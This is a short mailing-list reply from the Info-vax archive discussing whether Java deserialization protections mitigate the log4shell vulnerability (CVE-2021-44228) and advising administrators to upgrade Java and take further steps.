[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228
Craig A. Berry
craigberry at nospam.mac.com
Tue Dec 14 12:43:32 EST 2021
On 12/14/21 10:51 AM, Arne Vajhøj wrote:
> On 12/14/2021 11:39 AM, Stephen Hoffman wrote:
>> Early reports that Java 8 and newer were
>> not vulnerable were later found incorrect.
>
> So you are saying that the deserialization protections done in 9 and
> backported to 8u121 are not enough to prevent this vulnerability?
Those protections block one of several deserialization mechanisms. It
helps a little for what I understand to be the easiest way to execute
remote code. But we're way beyond what's easiest for the state actors
and others who are investing a lot of resources into exploiting this in
the wild. So do upgrade Java. But don't stop there.
More information about the Info-vax
mailing list